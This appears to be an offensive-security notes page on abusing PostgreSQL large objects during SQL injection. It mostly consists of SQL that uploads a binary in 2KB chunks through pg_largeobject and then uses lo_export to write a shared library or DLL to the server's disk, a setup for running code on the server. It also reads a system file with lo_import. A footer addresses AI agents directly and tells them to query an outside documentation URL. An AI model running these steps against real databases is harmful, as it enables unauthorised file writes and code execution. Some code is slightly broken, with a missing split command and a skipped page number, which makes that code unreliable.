# Big Binary Files Upload (PostgreSQL)

## PostgreSQL Large Objects <a href="#postgresql-large-objects" id="postgresql-large-objects"></a>

PostgreSQL exposes a structure called **large object (**`pg_largeobject` table), which is used for storing data that would be difficult to handle in its entirety (like an image or a PDF document). As opposed to the `COPY TO` function, the advantage of **large objects** lies in the fact that the **data** they **hold** can be **exported back** to the **file system** as an **identical copy of the original imported file**.

In order to **save a complete file inside this table** you first need to **create an object** inside the mentioned table (identified by a **LOID**) and then **insert chunks of 2KB** inside this object. It's very important that all the **chunks have 2KB** (except possible the last one) **or** the **exporting** function to the file system **won't work**.

In order to **split** your **binary** in **chunks** of size **2KB** you can do:

In order to encode each of the files created to Base64 or Hex you can use:

```
base64 -w 0 <Chunk_file> xxd -ps -c 99999999999 <Chunk_file> 
```

When exploiting this remember that you have to send **chunks of 2KB clear-text bytes** (not 2KB of base64 or hex encoded bytes). If you try to automate this, the size of a **hex encoded** file is the **double** (then you need to send 4KB of encoded data for each chunk) and the size of a **base64** encoded file is `ceil(n / 3) * 4`

Also, debugging the process you can see the contents of the large objects created with:

```
 select loid, pageno, encode(data, 'escape') from pg_largeobject;
```

## Using lo\_creat & Base64 <a href="#using-lo_creat-and-base64" id="using-lo_creat-and-base64"></a>

First, we need to create a LOID where the binary data is going to be saved:

```
SELECT lo_creat(-1);       SELECT lo_create(173454);   
```

If you are abusing a **Blind SQLinjection** you will be more interested on using `lo_create` with a **fixed LOID** so you **know where** you have to **upload** the **content**. Also, note that there is no syntax error the functions are `lo_creat` and `lo_create`.

LOID is used to identify the object in the `pg_largeobjec`t table. Inserting chunks of size 2KB into the `pg_largeobject` table can be achieved using:

```
INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 0, decode('', 'base64'));INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 1, decode('', 'base64'));INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 3, decode('', 'base64'));
```

Finally you can export the file to the file-system doing (during this example the LOID used was `173454`):

```
SELECT lo_export(173454, '/tmp/pg_exec.so');
```

You possible may be interested in delete the large object created after exporting it:

```
SELECT lo_unlink(173454);  
```

## Using lo\_import & Hex <a href="#using-lo_import-and-hex" id="using-lo_import-and-hex"></a>

In this scenario lo\_import is going to be used to create a large object object. Fortunately in this case you can (and cannot) specify the LOID you would want to use:

```
select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts');select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts', 173454);
```

After creating the object you can start inserting the data on each page (remember, you have to insert chunks of 2KB):

```
update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=0;update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=1;update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=2;update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=3;
```

The HEX must be just the hex (without `0x` or `\x`), example:

```
update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0;
```

Finally, export the data to a file and delete the large object:

```
 select lo_export(173454, 'C:\\path\to\pg_extension.dll');
 select lo_unlink(173454);  
```

## Limitations <a href="#limitations" id="limitations"></a>

After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL** (Access Control List). It's possible to configure **new large objects** so your user **don't have enough privileges** to read them even if they were created by your user.

However, there may be **old object with an ACL that allows current user to read it**, then we can exfiltrate that object's content.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pwc-3.gitbook.io/pwc/ji-shu/webpentest2/untitled-25/postgresql-injection/big-binary-files-upload-postgresql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
